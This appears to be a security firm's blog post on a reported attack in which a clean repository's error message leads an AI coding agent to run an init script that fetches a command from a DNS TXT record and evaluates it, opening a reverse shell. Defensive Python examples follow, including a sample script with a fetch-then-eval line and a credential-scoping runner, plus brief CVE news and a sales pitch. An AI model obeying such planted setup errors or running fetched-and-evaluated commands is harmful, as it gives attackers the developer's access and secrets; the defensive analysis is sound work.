
This month researchers at Mozilla's Zero Day Investigative Network (0DIN) demonstrated an attack that should change how every security team thinks about AI coding assistants. The attack has no exploit code. No malicious files in the repository. No suspicious command for anyone to approve. And it ends with a stranger holding an interactive shell on a developer's machine.
The trick is that the attacker never attacks the developer. The attacker attacks the agent.
How a clean repo becomes a reverse shell
The setup looks ordinary. A GitHub repository with a normal README, standard dependencies, and the kind of init instructions you have run a thousand times: pip3 install -r requirements.txt, then python3 -m axiom init.
The Python package is the bait, and it is built to misbehave on purpose. It refuses to run until it has been initialized, throwing an error that politely instructs the user to run python3 -m axiom init. A human might pause here. An AI coding agent does not. Claude Code reads the error, treats it as a routine setup hiccup, and runs the suggested command to recover - exactly what a helpful assistant should do.
That init command calls a shell script. The script pulls a configuration value out of a DNS TXT record the attacker controls, and the value is executed as a command. The agent never saw the DNS record. It never evaluated the payload. It fixed an error message it trusted, and three indirection steps later, the attacker has a shell running as the developer's own user.
As the 0DIN researchers put it: Claude Code never decided to open a shell. It decided to fix an error.
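To make the last two hops of that chain visible before anything runs, here is an added example from the defender's side (my own code, not 0DIN's research tooling and not the axiom package): a small Python checker that walks a setup script, reports where it reaches out to the network and where it executes dynamic content, and flags any fetched value that flows into an eval or a shell. The script it scans is a constructed sample that mirrors the fetch-then-execute shape described above; the domain config.example.invalid and the variable name CFG are placeholders, not values from the real repository.

```python
"""Added example: static chain disclosure for a setup script.

Walks a shell script line by line and reports (a) where it reaches out to
the network (curl, wget, dig/nslookup/host lookups) and (b) where it executes
dynamic content (eval, source, exec, sh -c, piping into a shell, process
substitution). A fetched value that reaches an execution sink is reported as
"fetch->exec": the link a reviewer needs to see before approving the command.
The parsing is deliberately simple (regexes, naive comment stripping); it is
a review aid, not a complete shell parser.
"""
from __future__ import annotations
import re
from dataclasses import dataclass

FETCH_RE = re.compile(r"\b(curl|wget|dig|nslookup|host)\b")
EXEC_RE = re.compile(
    r"\b(eval|source|exec)\b"          # direct evaluation builtins
    r"|\b(sh|bash|zsh)\s+-c\b"          # shell -c "<string>"
    r"|\|\s*(sh|bash|zsh)\b"            # ... | sh
    r"|\b(sh|bash|zsh)\s+<\("           # sh <(...)
)
ASSIGN_RE = re.compile(r"^\s*(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)=(.*)$")


@dataclass
class Finding:
    line: int
    kind: str   # "fetch", "exec" or "fetch->exec"
    text: str


def disclose_chain(script: str) -> list[Finding]:
    """Return the network fetches and dynamic executions in a shell script."""
    findings: list[Finding] = []
    tainted: set[str] = set()   # variables whose value came from a fetch
    for lineno, raw in enumerate(script.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # naive comment strip
        if not line:
            continue
        fetches = bool(FETCH_RE.search(line))
        executes = bool(EXEC_RE.search(line))
        assign = ASSIGN_RE.match(line)
        if fetches and assign:
            tainted.add(assign.group(1))
        if fetches and not executes:
            findings.append(Finding(lineno, "fetch", line))
        if executes:
            uses_tainted = any(re.search(rf"\$\{{?{v}\b", line) for v in tainted)
            kind = "fetch->exec" if (fetches or uses_tainted) else "exec"
            findings.append(Finding(lineno, kind, line))
    return findings


def fetch_to_exec_lines(script: str) -> list[int]:
    """Line numbers where fetched content is executed; empty means no such link."""
    return [f.line for f in disclose_chain(script) if f.kind == "fetch->exec"]


# Constructed sample (not the real repository's script): the fetch-then-execute
# shape described in the write-up, with a placeholder domain and variable name.
SAMPLE_INIT = """#!/bin/sh
set -e
pip3 install -r requirements.txt
CFG=$(dig +short TXT config.example.invalid | tr -d '"')
eval "$CFG"
echo "init complete"
"""

if __name__ == "__main__":
    for f in disclose_chain(SAMPLE_INIT):
        print(f"line {f.line:>3}  {f.kind:<11}  {f.text}")
```

Run on the sample, the checker reports the DNS lookup on line 4 as a fetch and the eval on line 5 as fetch->exec, which is the fact a reviewer (or the agent's own pre-execution disclosure) needs surfaced: not that the script fetches a config value, but that it executes what it fetched.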
Why this is different from supply chain attacks you already know
We have spent years training teams to scan dependencies, pin versions, and review code before it runs. Those controls all assume the malicious thing is in the package. Here, it is not. Every individual component is clean. The repository passes a scanner. The init script, read in isolation, fetches a config value - something packages do constantly. The DNS record is just text.
The attack lives in the seams between the parts, and the agent is the connective tissue that assembles them into a working exploit. No single artifact is suspicious enough to trip a control, because the maliciousness is distributed across the whole chain and only assembles at runtime.
This is what makes it dangerous. Your SAST tool has nothing to flag. Your dependency scanner has nothing to flag. Your human reviewer skims a benign README. The only component capable of seeing the full chain - the agent - is also the component that has been convinced to run it.
The identity problem underneath it
There is a second story running alongside this one, and it is the real lesson. AI agents now act with real privileges. They read environment variables. They hold API keys. They touch local config, cloud credentials, and source control. When an agent runs a command, it runs as you, with everything you can reach.
That means an agent tricked into running a payload is not a sandboxed nuisance. It is a privileged identity doing the attacker's work with the developer's access. The shell that opens has the developer's environment variables, their keys, their session tokens, and a clear path to persistence.
Security teams have spent a decade locking down human identities with MFA, least privilege, and conditional access. Agent identities have quietly arrived with broad standing access and almost none of that governance. Attackers noticed before most defenders did.
What this means for how you test
A scanner cannot find this, because there is nothing static to find. The exploit only exists when an agent assembles it. That is precisely the gap our AI pen test agents are built to probe - we do not just check whether a package is malicious, we check what your tooling will actually do when handed an ordinary-looking project with a well-placed error message.
Three things worth doing now:
- Treat agent execution as privileged execution. If an AI assistant can run shell commands with a developer's access, that path deserves the same scrutiny as any other privileged automation - logging, scoping, and review.
- Demand full chain disclosure. 0DIN's own recommendation is that agents surface the complete execution chain of setup commands, including scripts and anything fetched dynamically at runtime. If your agent cannot show you what it is about to run end to end, you cannot review it.
- Constrain where agents reach. An agent that needs to clone and build a project does not need standing access to production secrets. Scope the credentials available during automated setup down to the minimum, so a hijacked agent finds an empty room.
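The first and third items above, as an added example in code (mine, not uMercs' or 0DIN's): a Python wrapper that runs an agent's setup command the way privileged automation should run, with only an allowlisted set of environment variables passed through, anything whose name looks like a credential withheld even if allowlisted, a timeout, and an audit record of what ran, from where, and which variables it could see. The allowlist, the secret-name markers, and the optional JSON-lines log path are assumptions for the example.

```python
"""Added example: run an agent's setup command as scoped, audited automation.

The child process gets only an allowlisted set of environment variables;
everything else (cloud credentials, API tokens, session secrets) is withheld,
names that look like secrets are refused even when allowlisted, the run is
bounded by a timeout, and an audit record of what ran and what it could reach
is returned (and optionally appended to a JSON-lines log) for review.
"""
from __future__ import annotations
import json
import os
import subprocess
import time
from dataclasses import dataclass, asdict

# Assumed allowlist: what a clone-and-build step plausibly needs. Adjust per project.
DEFAULT_ALLOW = frozenset({"PATH", "HOME", "LANG", "TERM", "TMPDIR", "USER", "SHELL"})

# Substrings that mark a variable as a credential; refused regardless of the allowlist.
SECRET_MARKERS = ("KEY", "SECRET", "TOKEN", "PASSWORD", "CREDENTIAL")


def looks_like_secret(name: str) -> bool:
    return any(marker in name.upper() for marker in SECRET_MARKERS)


def build_scoped_env(base: dict[str, str], allow=DEFAULT_ALLOW) -> tuple[dict[str, str], list[str]]:
    """Split a base environment into (passed through, withheld names)."""
    env: dict[str, str] = {}
    withheld: list[str] = []
    for name, value in base.items():
        if name in allow and not looks_like_secret(name):
            env[name] = value
        else:
            withheld.append(name)
    return env, sorted(withheld)


@dataclass
class AuditRecord:
    argv: list[str]
    cwd: str
    exposed: list[str]      # variable names the command could read
    withheld: list[str]     # variable names it could not
    returncode: int | None  # None when the timeout fired
    seconds: float
    timed_out: bool
    stdout: str
    stderr: str


def _text(data) -> str:
    if data is None:
        return ""
    return data.decode("utf-8", "replace") if isinstance(data, bytes) else data


def run_scoped(argv, cwd=".", allow=DEFAULT_ALLOW, base_env=None,
               timeout=300, log_path=None) -> AuditRecord:
    """Run argv with a scoped environment and return an audit record."""
    base = dict(os.environ if base_env is None else base_env)
    env, withheld = build_scoped_env(base, allow)
    start = time.monotonic()
    timed_out, rc = False, None
    try:
        proc = subprocess.run(argv, cwd=cwd, env=env, capture_output=True,
                              text=True, timeout=timeout)
        rc, out, err = proc.returncode, proc.stdout, proc.stderr
    except subprocess.TimeoutExpired as exc:
        timed_out = True
        out, err = _text(exc.stdout), _text(exc.stderr)
    record = AuditRecord(list(argv), os.path.abspath(cwd), sorted(env), withheld,
                         rc, round(time.monotonic() - start, 3), timed_out, out, err)
    if log_path:
        with open(log_path, "a", encoding="utf-8") as fh:
            fh.write(json.dumps(asdict(record)) + "\n")
    return record


if __name__ == "__main__":
    # Constructed demo: a fake credential in the base environment is not visible to the child.
    demo = run_scoped(["/bin/sh", "-c", "echo token=${DEMO_API_TOKEN:-unset}"],
                      base_env={"PATH": "/usr/bin:/bin", "DEMO_API_TOKEN": "constructed"})
    print(demo.stdout.strip(), "withheld:", demo.withheld)
```

The design choice worth noting is that the environment is rebuilt from an allowlist rather than filtered by a denylist: a hijacked init script finds only what the build step was explicitly given, and the audit record states both lists, so a reviewer can see exactly what a compromised run could have exfiltrated.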
The supporting cast this week
The agent attack did not arrive in a quiet week. SimpleHelp's remote monitoring tool is under active exploitation through an authentication bypass (CVE-2026-48558) that lets attackers mint their own Technician accounts and remote into managed endpoints - a clean route to deploying the new Djinn infostealer. Oracle E-Business Suite is being hit through a critical flaw (CVE-2026-46817), with exploitation confirmed in the wild. And CISA set an urgent deadline for the Cisco Unified Communications Manager bug we covered last week, which remains under active attack.
The pattern holds. The vulnerabilities that hurt are rarely the exotic ones. They are the trusted tools - the remote support agent, the finance suite, the coding assistant - turned against the people who rely on them.
Test the tools you trust most.
uMercs runs offensive engagements that probe the systems your team assumes are safe - including the AI agents now embedded in your development pipeline. If you want to know what your tooling does when no one is watching, that is the engagement we run. Reach us at umercs.com.
Sources
Mozilla 0DIN - AI coding agent reverse shell via clean repository (June 27, 2026)
BleepingComputer - Clean GitHub repo tricks AI coding agents into running malware
BleepingComputer - Critical SimpleHelp flaw exploited to deploy Djinn Stealer (CVE-2026-48558)
BleepingComputer - Hackers now exploit critical Oracle E-Business flaw (CVE-2026-46817)
BleepingComputer - CISA sets urgent deadline to fix Cisco flaw exploited in attacks
Token Security via BleepingComputer - Agentic AI Has an Identity Problem and Attackers Know It